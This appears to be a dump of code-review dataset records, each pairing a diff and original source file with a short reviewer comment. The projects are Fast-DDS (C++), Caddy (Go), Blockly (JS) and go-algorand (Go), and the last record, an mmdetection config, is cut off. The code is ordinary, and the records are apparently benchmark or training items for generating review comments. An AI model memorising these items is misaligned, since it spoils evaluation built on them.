patch
stringlengths
17
31.2k
y
int64
1
1
oldf
stringlengths
0
2.21M
idx
int64
1
1
id
int64
4.29k
68.4k
msg
stringlengths
8
843
proj
stringclasses
212 values
lang
stringclasses
9 values
@@ -149,6 +149,8 @@ void PDPSimpleListener::onNewCacheChangeAdded(RTPSReader* reader, const CacheCha { listener->onParticipantDiscovery(this->mp_SPDP->getRTPSParticipant()->getUserRTPSParticipant(), std::move(info)); } + + return; // change already removed from history } }
1
// Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima). // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. /** * @file PDPSimpleListener.cpp * */ #include <fastrtps/rtps/builtin/discovery/participant/PDPSimpleListener.h> #include <fastrtps/rtps/builtin/discovery/participant/timedevent/RemoteParticipantLeaseDuration.h> #include <fastrtps/rtps/builtin/discovery/participant/PDPSimple.h> #include "../../../participant/RTPSParticipantImpl.h" #include <fastrtps/rtps/builtin/discovery/endpoint/EDP.h> #include <fastrtps/rtps/reader/RTPSReader.h> #include <fastrtps/rtps/history/ReaderHistory.h> #include <fastrtps/rtps/participant/ParticipantDiscoveryInfo.h> #include <fastrtps/rtps/participant/RTPSParticipantListener.h> #include <fastrtps/utils/TimeConversion.h> #include <mutex> #include <fastrtps/log/Log.h> namespace eprosima { namespace fastrtps{ namespace rtps { void PDPSimpleListener::onNewCacheChangeAdded(RTPSReader* reader, const CacheChange_t* const change_in) { CacheChange_t* change = (CacheChange_t*)(change_in); logInfo(RTPS_PDP,"SPDP Message received"); if(change->instanceHandle == c_InstanceHandle_Unknown) { if(!this->getKey(change)) { logWarning(RTPS_PDP,"Problem getting the key of the change, removing"); this->mp_SPDP->mp_SPDPReaderHistory->remove_change(change); return; } } if(change->kind == ALIVE) { //LOAD INFORMATION IN TEMPORAL RTPSParticipant PROXY DATA ParticipantProxyData participant_data; CDRMessage_t msg(change->serializedPayload); if(participant_data.readFromCDRMessage(&msg)) { //AFTER CORRECTLY READING IT //CHECK IF IS THE SAME RTPSParticipant change->instanceHandle = participant_data.m_key; if(participant_data.m_guid == mp_SPDP->getRTPSParticipant()->getGuid()) { logInfo(RTPS_PDP,"Message from own RTPSParticipant, removing"); this->mp_SPDP->mp_SPDPReaderHistory->remove_change(change); return; } // At this point we can release reader lock. reader->getMutex()->unlock(); //LOOK IF IS AN UPDATED INFORMATION ParticipantProxyData* pdata = nullptr; std::unique_lock<std::recursive_mutex> lock(*mp_SPDP->getMutex()); for (auto it = mp_SPDP->m_participantProxies.begin(); it != mp_SPDP->m_participantProxies.end();++it) { if(participant_data.m_key == (*it)->m_key) { pdata = (*it); break; } } auto status = (pdata == nullptr) ? ParticipantDiscoveryInfo::DISCOVERED_PARTICIPANT : ParticipantDiscoveryInfo::CHANGED_QOS_PARTICIPANT; if(pdata == nullptr) { //IF WE DIDNT FOUND IT WE MUST CREATE A NEW ONE pdata = new ParticipantProxyData(participant_data); pdata->isAlive = true; pdata->mp_leaseDurationTimer = new RemoteParticipantLeaseDuration(mp_SPDP, pdata, TimeConv::Time_t2MilliSecondsDouble(pdata->m_leaseDuration)); pdata->mp_leaseDurationTimer->restart_timer(); this->mp_SPDP->m_participantProxies.push_back(pdata); lock.unlock(); mp_SPDP->announceParticipantState(false); mp_SPDP->assignRemoteEndpoints(&participant_data); } else { pdata->updateData(participant_data); pdata->isAlive = true; lock.unlock(); if(mp_SPDP->m_discovery.use_STATIC_EndpointDiscoveryProtocol) mp_SPDP->mp_EDP->assignRemoteEndpoints(participant_data); } auto listener = this->mp_SPDP->getRTPSParticipant()->getListener(); if (listener != nullptr) { ParticipantDiscoveryInfo info; info.status = status; info.info = participant_data; listener->onParticipantDiscovery(this->mp_SPDP->getRTPSParticipant()->getUserRTPSParticipant(), std::move(info)); } // Take again the reader lock reader->getMutex()->lock(); } } else { GUID_t guid; iHandle2GUID(guid, change->instanceHandle); ParticipantDiscoveryInfo info; info.status = ParticipantDiscoveryInfo::REMOVED_PARTICIPANT; this->mp_SPDP->lookupParticipantProxyData(guid, info.info); if(this->mp_SPDP->removeRemoteParticipant(guid)) { auto listener = this->mp_SPDP->getRTPSParticipant()->getListener(); if(listener != nullptr) { listener->onParticipantDiscovery(this->mp_SPDP->getRTPSParticipant()->getUserRTPSParticipant(), std::move(info)); } } } //Remove change form history. this->mp_SPDP->mp_SPDPReaderHistory->remove_change(change); return; } bool PDPSimpleListener::getKey(CacheChange_t* change) { return ParameterList::readInstanceHandleFromCDRMsg(change, PID_PARTICIPANT_GUID); } } } /* namespace rtps */ } /* namespace eprosima */
1
14,257
Then, where is it removed?
eProsima-Fast-DDS
cpp
@@ -16,6 +16,7 @@ func TestVHostTrie(t *testing.T) { "example.com/foo/bar", "*.example.com/test", }) + CaseSensitivePath = true assertTestTrie(t, trie, []vhostTrieTest{ {"not-in-trie.com", false, "", "/"}, {"example", true, "example", "/"},
1
package httpserver import ( "net/http" "net/http/httptest" "testing" ) func TestVHostTrie(t *testing.T) { trie := newVHostTrie() populateTestTrie(trie, []string{ "example", "example.com", "*.example.com", "example.com/foo", "example.com/foo/bar", "*.example.com/test", }) assertTestTrie(t, trie, []vhostTrieTest{ {"not-in-trie.com", false, "", "/"}, {"example", true, "example", "/"}, {"example.com", true, "example.com", "/"}, {"example.com/test", true, "example.com", "/"}, {"example.com/foo", true, "example.com/foo", "/foo"}, {"example.com/foo/", true, "example.com/foo", "/foo"}, {"EXAMPLE.COM/foo", true, "example.com/foo", "/foo"}, {"EXAMPLE.COM/Foo", true, "example.com", "/"}, {"example.com/foo/bar", true, "example.com/foo/bar", "/foo/bar"}, {"example.com/foo/bar/baz", true, "example.com/foo/bar", "/foo/bar"}, {"example.com/foo/other", true, "example.com/foo", "/foo"}, {"foo.example.com", true, "*.example.com", "/"}, {"foo.example.com/else", true, "*.example.com", "/"}, }, false) } func TestVHostTrieWildcard1(t *testing.T) { trie := newVHostTrie() populateTestTrie(trie, []string{ "example.com", "", }) assertTestTrie(t, trie, []vhostTrieTest{ {"not-in-trie.com", true, "", "/"}, {"example.com", true, "example.com", "/"}, {"example.com/foo", true, "example.com", "/"}, {"not-in-trie.com/asdf", true, "", "/"}, }, true) } func TestVHostTrieWildcard2(t *testing.T) { trie := newVHostTrie() populateTestTrie(trie, []string{ "0.0.0.0/asdf", }) assertTestTrie(t, trie, []vhostTrieTest{ {"example.com/asdf/foo", true, "0.0.0.0/asdf", "/asdf"}, {"example.com/foo", false, "", "/"}, {"host/asdf", true, "0.0.0.0/asdf", "/asdf"}, }, true) } func TestVHostTrieWildcard3(t *testing.T) { trie := newVHostTrie() populateTestTrie(trie, []string{ "*/foo", }) assertTestTrie(t, trie, []vhostTrieTest{ {"example.com/foo", true, "*/foo", "/foo"}, {"example.com", false, "", "/"}, }, true) } func TestVHostTriePort(t *testing.T) { // Make sure port is stripped out trie := newVHostTrie() populateTestTrie(trie, []string{ "example.com:1234", }) assertTestTrie(t, trie, []vhostTrieTest{ {"example.com/foo", true, "example.com:1234", "/"}, }, true) } func populateTestTrie(trie *vhostTrie, keys []string) { for _, key := range keys { // we wrap this in a func, passing in the key, otherwise the // handler always writes the last key to the response, even // if the handler is actually from one of the earlier keys. func(key string) { site := &SiteConfig{ middlewareChain: HandlerFunc(func(w http.ResponseWriter, r *http.Request) (int, error) { w.Write([]byte(key)) return 0, nil }), } trie.Insert(key, site) }(key) } } type vhostTrieTest struct { query string expectMatch bool expectedKey string matchedPrefix string // the path portion of a key that is expected to be matched } func assertTestTrie(t *testing.T, trie *vhostTrie, tests []vhostTrieTest, hasWildcardHosts bool) { for i, test := range tests { site, pathPrefix := trie.Match(test.query) if !test.expectMatch { if site != nil { // If not expecting a value, then just make sure we didn't get one t.Errorf("Test %d: Expected no matches, but got %v", i, site) } continue } // Otherwise, we must assert we got a value if site == nil { t.Errorf("Test %d: Expected non-nil return value, but got: %v", i, site) continue } // And it must be the correct value resp := httptest.NewRecorder() site.middlewareChain.ServeHTTP(resp, nil) actualHandlerKey := resp.Body.String() if actualHandlerKey != test.expectedKey { t.Errorf("Test %d: Expected match '%s' but matched '%s'", i, test.expectedKey, actualHandlerKey) } // The path prefix must also be correct if test.matchedPrefix != pathPrefix { t.Errorf("Test %d: Expected matched path prefix to be '%s', got '%s'", i, test.matchedPrefix, pathPrefix) } } }
1
10,348
The tests are not run concurrently? (I don't know. Better check.)
caddyserver-caddy
go
@@ -131,7 +131,7 @@ Blockly.FieldTextInput.prototype.showEditor_ = function(opt_quietInput) { var htmlInput = goog.dom.createDom('input', 'blocklyHtmlInput'); htmlInput.setAttribute('spellcheck', this.spellcheck_); var fontSize = - (Blockly.FieldTextInput.FONTSIZE * this.workspace_.scale) + 'pt'; + (Blockly.FieldTextInput.FONTSIZE) + 'pt'; div.style.fontSize = fontSize; htmlInput.style.fontSize = fontSize; /** @type {!HTMLInputElement} */
1
/** * @license * Visual Blocks Editor * * Copyright 2012 Google Inc. * https://developers.google.com/blockly/ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @fileoverview Text input field. * @author [email protected] (Neil Fraser) */ 'use strict'; goog.provide('Blockly.FieldTextInput'); goog.require('Blockly.BlockSvg.render'); goog.require('Blockly.Field'); goog.require('Blockly.Msg'); goog.require('goog.asserts'); goog.require('goog.dom'); goog.require('goog.userAgent'); /** * Class for an editable text field. * @param {string} text The initial content of the field. * @param {Function=} opt_validator An optional function that is called * to validate any constraints on what the user entered. Takes the new * text as an argument and returns either the accepted text, a replacement * text, or null to abort the change. * @extends {Blockly.Field} * @constructor */ Blockly.FieldTextInput = function(text, opt_validator) { Blockly.FieldTextInput.superClass_.constructor.call(this, text, opt_validator); }; goog.inherits(Blockly.FieldTextInput, Blockly.Field); /** * Point size of text. Should match blocklyText's font-size in CSS. */ Blockly.FieldTextInput.FONTSIZE = 11; /** * Mouse cursor style when over the hotspot that initiates the editor. */ Blockly.FieldTextInput.prototype.CURSOR = 'text'; /** * Allow browser to spellcheck this field. * @private */ Blockly.FieldTextInput.prototype.spellcheck_ = true; /** * Close the input widget if this input is being deleted. */ Blockly.FieldTextInput.prototype.dispose = function() { Blockly.WidgetDiv.hideIfOwner(this); Blockly.FieldTextInput.superClass_.dispose.call(this); }; /** * Set the text in this field. * @param {?string} text New text. * @override */ Blockly.FieldTextInput.prototype.setValue = function(text) { if (text === null) { return; // No change if null. } if (this.sourceBlock_ && this.validator_) { var validated = this.validator_(text); // If the new text is invalid, validation returns null. // In this case we still want to display the illegal result. if (validated !== null && validated !== undefined) { text = validated; } } Blockly.Field.prototype.setValue.call(this, text); }; /** * Set whether this field is spellchecked by the browser. * @param {boolean} check True if checked. */ Blockly.FieldTextInput.prototype.setSpellcheck = function(check) { this.spellcheck_ = check; }; /** * Show the inline free-text editor on top of the text. * @param {boolean=} opt_quietInput True if editor should be created without * focus. Defaults to false. * @private */ Blockly.FieldTextInput.prototype.showEditor_ = function(opt_quietInput) { this.workspace_ = this.sourceBlock_.workspace; var quietInput = opt_quietInput || false; if (!quietInput && (goog.userAgent.MOBILE || goog.userAgent.ANDROID || goog.userAgent.IPAD)) { // Mobile browsers have issues with in-line textareas (focus & keyboards). var newValue = window.prompt(Blockly.Msg.CHANGE_VALUE_TITLE, this.text_); if (this.sourceBlock_ && this.validator_) { var override = this.validator_(newValue); if (override !== undefined) { newValue = override; } } this.setValue(newValue); return; } Blockly.WidgetDiv.show(this, this.sourceBlock_.RTL, this.widgetDispose_()); var div = Blockly.WidgetDiv.DIV; // Create the input. var htmlInput = goog.dom.createDom('input', 'blocklyHtmlInput'); htmlInput.setAttribute('spellcheck', this.spellcheck_); var fontSize = (Blockly.FieldTextInput.FONTSIZE * this.workspace_.scale) + 'pt'; div.style.fontSize = fontSize; htmlInput.style.fontSize = fontSize; /** @type {!HTMLInputElement} */ Blockly.FieldTextInput.htmlInput_ = htmlInput; div.appendChild(htmlInput); htmlInput.value = htmlInput.defaultValue = this.text_; htmlInput.oldValue_ = null; this.validate_(); this.resizeEditor_(); if (!quietInput) { htmlInput.focus(); htmlInput.select(); } // Bind to keydown -- trap Enter without IME and Esc to hide. htmlInput.onKeyDownWrapper_ = Blockly.bindEvent_(htmlInput, 'keydown', this, this.onHtmlInputKeyDown_); // Bind to keyup -- trap Enter; resize after every keystroke. htmlInput.onKeyUpWrapper_ = Blockly.bindEvent_(htmlInput, 'keyup', this, this.onHtmlInputChange_); // Bind to keyPress -- repeatedly resize when holding down a key. htmlInput.onKeyPressWrapper_ = Blockly.bindEvent_(htmlInput, 'keypress', this, this.onHtmlInputChange_); htmlInput.onWorkspaceChangeWrapper_ = this.resizeEditor_.bind(this); this.workspace_.addChangeListener(htmlInput.onWorkspaceChangeWrapper_); }; /** * Handle key down to the editor. * @param {!Event} e Keyboard event. * @private */ Blockly.FieldTextInput.prototype.onHtmlInputKeyDown_ = function(e) { var htmlInput = Blockly.FieldTextInput.htmlInput_; var tabKey = 9, enterKey = 13, escKey = 27; if (e.keyCode == enterKey) { Blockly.WidgetDiv.hide(); } else if (e.keyCode == escKey) { htmlInput.value = htmlInput.defaultValue; Blockly.WidgetDiv.hide(); } else if (e.keyCode == tabKey) { Blockly.WidgetDiv.hide(); this.sourceBlock_.tab(this, !e.shiftKey); e.preventDefault(); } }; /** * Handle a change to the editor. * @param {!Event} e Keyboard event. * @private */ Blockly.FieldTextInput.prototype.onHtmlInputChange_ = function(e) { var htmlInput = Blockly.FieldTextInput.htmlInput_; // Update source block. var text = htmlInput.value; if (text !== htmlInput.oldValue_) { htmlInput.oldValue_ = text; this.setValue(text); this.validate_(); } else if (goog.userAgent.WEBKIT) { // Cursor key. Render the source block to show the caret moving. // Chrome only (version 26, OS X). this.sourceBlock_.render(); } this.resizeEditor_(); }; /** * Check to see if the contents of the editor validates. * Style the editor accordingly. * @private */ Blockly.FieldTextInput.prototype.validate_ = function() { var valid = true; goog.asserts.assertObject(Blockly.FieldTextInput.htmlInput_); var htmlInput = Blockly.FieldTextInput.htmlInput_; if (this.sourceBlock_ && this.validator_) { valid = this.validator_(htmlInput.value); } if (valid === null) { Blockly.addClass_(htmlInput, 'blocklyInvalidInput'); } else { Blockly.removeClass_(htmlInput, 'blocklyInvalidInput'); } }; /** * Resize the editor and the underlying block to fit the text. * @private */ Blockly.FieldTextInput.prototype.resizeEditor_ = function() { var div = Blockly.WidgetDiv.DIV; var bBox = this.fieldGroup_.getBBox(); var height = bBox.height * this.sourceBlock_.workspace.scale; var width = Math.max( bBox.width, Blockly.BlockSvg.FIELD_WIDTH-Blockly.BlockSvg.SEP_SPACE_X) * this.sourceBlock_.workspace.scale div.style.width = width + 'px'; div.style.height = height + 'px'; var xy = this.getAbsoluteXY_(); xy.x += Blockly.BlockSvg.SEP_SPACE_X * this.sourceBlock_.workspace.scale; // @todo Why 3? xy.y += (Blockly.BlockSvg.FIELD_HEIGHT * this.sourceBlock_.workspace.scale)/2 - height/2 + 3; // In RTL mode block fields and LTR input fields the left edge moves, // whereas the right edge is fixed. Reposition the editor. if (this.sourceBlock_.RTL) { var borderBBox = this.getScaledBBox_(); xy.x += borderBBox.width; xy.x -= div.offsetWidth; } // Shift by a few pixels to line up exactly. xy.y += 1; if (goog.userAgent.GECKO && Blockly.WidgetDiv.DIV.style.top) { // Firefox mis-reports the location of the border by a pixel // once the WidgetDiv is moved into position. xy.x -= 1; xy.y -= 1; } if (goog.userAgent.WEBKIT) { xy.y -= 3; } div.style.left = xy.x + 'px'; div.style.top = xy.y + 'px'; }; /** * Close the editor, save the results, and dispose of the editable * text field's elements. * @return {!Function} Closure to call on destruction of the WidgetDiv. * @private */ Blockly.FieldTextInput.prototype.widgetDispose_ = function() { var thisField = this; return function() { var htmlInput = Blockly.FieldTextInput.htmlInput_; // Save the edit (if it validates). var text = htmlInput.value; if (thisField.sourceBlock_ && thisField.validator_) { var text1 = thisField.validator_(text); if (text1 === null) { // Invalid edit. text = htmlInput.defaultValue; } else if (text1 !== undefined) { // Validation function has changed the text. text = text1; } } thisField.setValue(text); thisField.sourceBlock_.rendered && thisField.sourceBlock_.render(); Blockly.unbindEvent_(htmlInput.onKeyDownWrapper_); Blockly.unbindEvent_(htmlInput.onKeyUpWrapper_); Blockly.unbindEvent_(htmlInput.onKeyPressWrapper_); thisField.workspace_.removeChangeListener( htmlInput.onWorkspaceChangeWrapper_); Blockly.FieldTextInput.htmlInput_ = null; // Delete style properties. var style = Blockly.WidgetDiv.DIV.style; style.width = 'auto'; style.height = 'auto'; style.fontSize = ''; }; }; /** * Ensure that only a number may be entered. * @param {string} text The user's text. * @return {?string} A string representing a valid number, or null if invalid. */ Blockly.FieldTextInput.numberValidator = function(text) { if (text === null) { return null; } text = String(text); // TODO: Handle cases like 'ten', '1.203,14', etc. // 'O' is sometimes mistaken for '0' by inexperienced users. text = text.replace(/O/ig, '0'); // Strip out thousands separators. text = text.replace(/,/g, ''); var n = parseFloat(text || 0); return isNaN(n) ? null : String(n); }; /** * Ensure that only a nonnegative integer may be entered. * @param {string} text The user's text. * @return {?string} A string representing a valid int, or null if invalid. */ Blockly.FieldTextInput.nonnegativeIntegerValidator = function(text) { var n = Blockly.FieldTextInput.numberValidator(text); if (n) { n = String(Math.max(0, Math.floor(n))); } return n; };
1
7,575
Regardless of scale?
LLK-scratch-blocks
js
@@ -44,6 +44,14 @@ var dataDirectory = flag.String("d", "", "Root Algorand daemon data path") var versionCheck = flag.Bool("v", false, "Display and write current build version and exit") var telemetryOverride = flag.String("t", "", `Override telemetry setting if supported (Use "true", "false", "0" or "1")`) +// the following flags aren't being used by the algoh, but are needed so that the flag package won't complain that +// these flags were provided but were not defined. We grab all the input flags and pass these downstream to the algod executable +// as an input arguments. +var peerOverride = flag.String("p", "", "Override phonebook with peer ip:port (or semicolon separated list: ip:port;ip:port;ip:port...)") +var listenIP = flag.String("l", "", "Override config.EndpointAddress (REST listening address) with ip:port") +var seed = flag.String("seed", "", "input to math/rand.Seed()") +var genesisFile = flag.String("g", "", "Genesis configuration file") + const algodFileName = "algod" const goalFileName = "goal"
1
// Copyright (C) 2019-2020 Algorand, Inc. // This file is part of go-algorand // // go-algorand is free software: you can redistribute it and/or modify // it under the terms of the GNU Affero General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // go-algorand is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Affero General Public License for more details. // // You should have received a copy of the GNU Affero General Public License // along with go-algorand. If not, see <https://www.gnu.org/licenses/>. package main import ( "flag" "fmt" "io/ioutil" "os" "os/exec" "os/signal" "path/filepath" "sync" "syscall" "time" "github.com/algorand/go-algorand/config" "github.com/algorand/go-algorand/crypto" "github.com/algorand/go-algorand/daemon/algod/api/client" "github.com/algorand/go-algorand/data/bookkeeping" "github.com/algorand/go-algorand/logging" "github.com/algorand/go-algorand/logging/telemetryspec" "github.com/algorand/go-algorand/nodecontrol" "github.com/algorand/go-algorand/shared/algoh" "github.com/algorand/go-algorand/tools/network" "github.com/algorand/go-algorand/util" ) var dataDirectory = flag.String("d", "", "Root Algorand daemon data path") var versionCheck = flag.Bool("v", false, "Display and write current build version and exit") var telemetryOverride = flag.String("t", "", `Override telemetry setting if supported (Use "true", "false", "0" or "1")`) const algodFileName = "algod" const goalFileName = "goal" var exeDir string func init() { } type stdCollector struct { output string } func (c *stdCollector) Write(p []byte) (n int, err error) { s := string(p) c.output += s return len(p), nil } func main() { blockWatcherInitialized := false flag.Parse() nc := getNodeController() genesis, err := nc.GetGenesis() if err != nil { fmt.Fprintln(os.Stdout, "error loading telemetry config", err) return } dataDir := ensureDataDir() absolutePath, absPathErr := filepath.Abs(dataDir) config.UpdateVersionDataDir(absolutePath) if *versionCheck { fmt.Println(config.FormatVersionAndLicense()) return } // If data directory doesn't exist, we can't run. Don't bother trying. if len(dataDir) == 0 { fmt.Fprintln(os.Stderr, "Data directory not specified. Please use -d or set $ALGORAND_DATA in your environment.") os.Exit(1) } if absPathErr != nil { reportErrorf("Can't convert data directory's path to absolute, %v\n", dataDir) } if _, err := os.Stat(absolutePath); err != nil { reportErrorf("Data directory %s does not appear to be valid\n", dataDir) } algohConfig, err := algoh.LoadConfigFromFile(filepath.Join(dataDir, algoh.ConfigFilename)) if err != nil && !os.IsNotExist(err) { reportErrorf("Error loading configuration, %v\n", err) } validateConfig(algohConfig) done := make(chan struct{}) log := logging.Base() configureLogging(genesis, log, absolutePath, done) defer log.CloseTelemetry() exeDir, err = util.ExeDir() if err != nil { reportErrorf("Error getting ExeDir: %v\n", err) } var errorOutput stdCollector var output stdCollector go func() { args := make([]string, len(os.Args)-1) copy(args, os.Args[1:]) // Copy our arguments (skip the executable) if log.GetTelemetryEnabled() { args = append(args, "-s", log.GetTelemetrySession()) } algodPath := filepath.Join(exeDir, algodFileName) cmd := exec.Command(algodPath, args...) cmd.Stderr = &errorOutput cmd.Stdout = &output err = cmd.Start() if err != nil { reportErrorf("error starting algod: %v", err) } err = cmd.Wait() if err != nil { reportErrorf("error waiting for algod: %v", err) } close(done) // capture logs if algod terminated prior to blockWatcher starting if !blockWatcherInitialized { captureErrorLogs(algohConfig, errorOutput, output, absolutePath, true) } log.Infoln("++++++++++++++++++++++++++++++++++++++++") log.Infoln("algod exited. Exiting...") log.Infoln("++++++++++++++++++++++++++++++++++++++++") }() // Set up error capturing defer func() { captureErrorLogs(algohConfig, errorOutput, output, absolutePath, false) }() // Handle signals cleanly c := make(chan os.Signal) signal.Notify(c, os.Interrupt, syscall.SIGTERM, syscall.SIGINT) signal.Ignore(syscall.SIGHUP) go func() { sig := <-c fmt.Printf("Exiting algoh on %v\n", sig) os.Exit(0) }() algodClient, err := waitForClient(nc, done) if err != nil { reportErrorf("error creating Rest Client: %v\n", err) } var wg sync.WaitGroup deadMan := makeDeadManWatcher(algohConfig.DeadManTimeSec, algodClient, algohConfig.UploadOnError, done, &wg) wg.Add(1) listeners := []blockListener{deadMan} if algohConfig.SendBlockStats { // Note: Resume can be implemented here. Store blockListener state and set curBlock based on latestBlock/lastBlock. listeners = append(listeners, &blockstats{log: logging.Base()}) } delayBetweenStatusChecks := time.Duration(algohConfig.StatusDelayMS) * time.Millisecond stallDetectionDelay := time.Duration(algohConfig.StallDelayMS) * time.Millisecond runBlockWatcher(listeners, algodClient, done, &wg, delayBetweenStatusChecks, stallDetectionDelay) wg.Add(1) blockWatcherInitialized = true wg.Wait() fmt.Println("Exiting algoh normally...") } func waitForClient(nc nodecontrol.NodeController, abort chan struct{}) (client client.RestClient, err error) { for { client, err = getRestClient(nc) if err == nil { return client, nil } select { case <-abort: err = fmt.Errorf("aborted waiting for client") return case <-time.After(100 * time.Millisecond): } } } func getRestClient(nc nodecontrol.NodeController) (rc client.RestClient, err error) { // Fetch the algod client algodClient, err := nc.AlgodClient() if err != nil { return } // Make sure the node is running _, err = algodClient.Status() if err != nil { return } return algodClient, nil } func resolveDataDir() string { // Figure out what data directory to tell algod to use. // If not specified on cmdline with '-d', look for default in environment. var dir string if dataDirectory == nil || *dataDirectory == "" { dir = os.Getenv("ALGORAND_DATA") } else { dir = *dataDirectory } return dir } func ensureDataDir() string { // Get the target data directory to work against, // then handle the scenario where no data directory is provided. dir := resolveDataDir() if dir == "" { reportErrorf("Data directory not specified. Please use -d or set $ALGORAND_DATA in your environment. Exiting.\n") } return dir } func getNodeController() nodecontrol.NodeController { binDir, err := util.ExeDir() if err != nil { panic(err) } nc := nodecontrol.MakeNodeController(binDir, ensureDataDir()) return nc } func configureLogging(genesis bookkeeping.Genesis, log logging.Logger, rootPath string, abort chan struct{}) { log = logging.Base() liveLog := fmt.Sprintf("%s/host.log", rootPath) fmt.Println("Logging to: ", liveLog) writer, err := os.OpenFile(liveLog, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666) if err != nil { panic(fmt.Sprintf("configureLogging: cannot open log file %v", err)) } log.SetOutput(writer) log.SetJSONFormatter() log.SetLevel(logging.Debug) initTelemetry(genesis, log, rootPath, abort) // if we have the telemetry enabled, we want to use it's sessionid as part of the // collected metrics decorations. fmt.Fprintln(writer, "++++++++++++++++++++++++++++++++++++++++") fmt.Fprintln(writer, "Logging Starting") fmt.Fprintln(writer, "++++++++++++++++++++++++++++++++++++++++") } func initTelemetry(genesis bookkeeping.Genesis, log logging.Logger, dataDirectory string, abort chan struct{}) { // Enable telemetry hook in daemon to send logs to cloud // If ALGOTEST env variable is set, telemetry is disabled - allows disabling telemetry for tests isTest := os.Getenv("ALGOTEST") != "" if !isTest { telemetryConfig, err := logging.EnsureTelemetryConfig(&dataDirectory, genesis.ID()) if err != nil { fmt.Fprintln(os.Stdout, "error loading telemetry config", err) return } // Apply telemetry override. telemetryConfig.Enable = logging.TelemetryOverride(*telemetryOverride) if telemetryConfig.Enable { err = log.EnableTelemetry(telemetryConfig) if err != nil { fmt.Fprintln(os.Stdout, "error creating telemetry hook", err) return } if log.GetTelemetryEnabled() { cfg, err := config.LoadConfigFromDisk(dataDirectory) if err != nil && !os.IsNotExist(err) { log.Fatalf("Cannot load config: %v", err) } // If the telemetry URI is not set, periodically check SRV records for new telemetry URI if log.GetTelemetryURI() == "" { network.StartTelemetryURIUpdateService(time.Minute, cfg, genesis.Network, log, abort) } // For privacy concerns, we don't want to provide the full data directory to telemetry. // But to be useful where multiple nodes are installed for convenience, we should be // able to discriminate between instances with the last letter of the path. if dataDirectory != "" { dataDirectory = dataDirectory[len(dataDirectory)-1:] } currentVersion := config.GetCurrentVersion() startupDetails := telemetryspec.StartupEventDetails{ Version: currentVersion.String(), CommitHash: currentVersion.CommitHash, Branch: currentVersion.Branch, Channel: currentVersion.Channel, InstanceHash: crypto.Hash([]byte(dataDirectory)).String(), } log.EventWithDetails(telemetryspec.HostApplicationState, telemetryspec.StartupEvent, startupDetails) } } } } // capture algod error output and optionally upload logs func captureErrorLogs(algohConfig algoh.HostConfig, errorOutput stdCollector, output stdCollector, absolutePath string, errorCondition bool) { if errorOutput.output != "" { fmt.Fprintf(os.Stdout, "errorOutput.output: `%s`\n", errorOutput.output) errorCondition = true fmt.Fprintf(os.Stderr, errorOutput.output) details := telemetryspec.ErrorOutputEventDetails{ Error: errorOutput.output, Output: output.output, } log.EventWithDetails(telemetryspec.HostApplicationState, telemetryspec.ErrorOutputEvent, details) // Write stdout & stderr streams to disk _ = ioutil.WriteFile(filepath.Join(absolutePath, nodecontrol.StdOutFilename), []byte(output.output), os.ModePerm) _ = ioutil.WriteFile(filepath.Join(absolutePath, nodecontrol.StdErrFilename), []byte(errorOutput.output), os.ModePerm) } if errorCondition && algohConfig.UploadOnError { fmt.Fprintf(os.Stdout, "Uploading logs...\n") sendLogs() } } func reportErrorf(format string, args ...interface{}) { fmt.Fprintf(os.Stderr, format, args...) logging.Base().Fatalf(format, args...) } func sendLogs() { var args []string args = append(args, "-d", ensureDataDir()) args = append(args, "logging", "send") goalPath := filepath.Join(exeDir, goalFileName) cmd := exec.Command(goalPath, args...) err := cmd.Run() if err != nil { reportErrorf("Error sending logs: %v\n", err) } } func validateConfig(config algoh.HostConfig) { // Enforce a reasonable deadman timeout if config.DeadManTimeSec > 0 && config.DeadManTimeSec < 30 { reportErrorf("Config.DeadManTimeSec should be >= 30 seconds (set to %v)\n", config.DeadManTimeSec) } }
1
39,037
Nit: should not we hide them from printing out?
algorand-go-algorand
go
@@ -196,7 +196,7 @@ test_pipeline = [ dict(type='RandomFlip'), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size_divisor=32), - dict(type='ImageToTensor', keys=['img']), + dict(type='DefaultFormatBundle'), dict(type='Collect', keys=['img']), ]) ]
1
# model settings model = dict( type='MaskRCNN', pretrained='torchvision://resnet50', backbone=dict( type='ResNet', depth=50, num_stages=4, out_indices=(0, 1, 2, 3), frozen_stages=1, style='pytorch'), neck=dict( type='FPN', in_channels=[256, 512, 1024, 2048], out_channels=256, num_outs=5), rpn_head=dict( type='RPNHead', in_channels=256, feat_channels=256, anchor_scales=[8], anchor_ratios=[0.5, 1.0, 2.0], anchor_strides=[4, 8, 16, 32, 64], target_means=[.0, .0, .0, .0], target_stds=[1.0, 1.0, 1.0, 1.0], loss_cls=dict( type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0), loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)), bbox_roi_extractor=dict( type='SingleRoIExtractor', roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2), out_channels=256, featmap_strides=[4, 8, 16, 32]), bbox_head=dict( type='SharedFCBBoxHead', num_fcs=2, in_channels=256, fc_out_channels=1024, roi_feat_size=7, num_classes=81, target_means=[0., 0., 0., 0.], target_stds=[0.1, 0.1, 0.2, 0.2], reg_class_agnostic=False, loss_cls=dict( type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0), loss_bbox=dict(type='SmoothL1Loss', beta=1.0, loss_weight=1.0)), mask_roi_extractor=dict( type='SingleRoIExtractor', roi_layer=dict(type='RoIAlign', out_size=14, sample_num=2), out_channels=256, featmap_strides=[4, 8, 16, 32]), 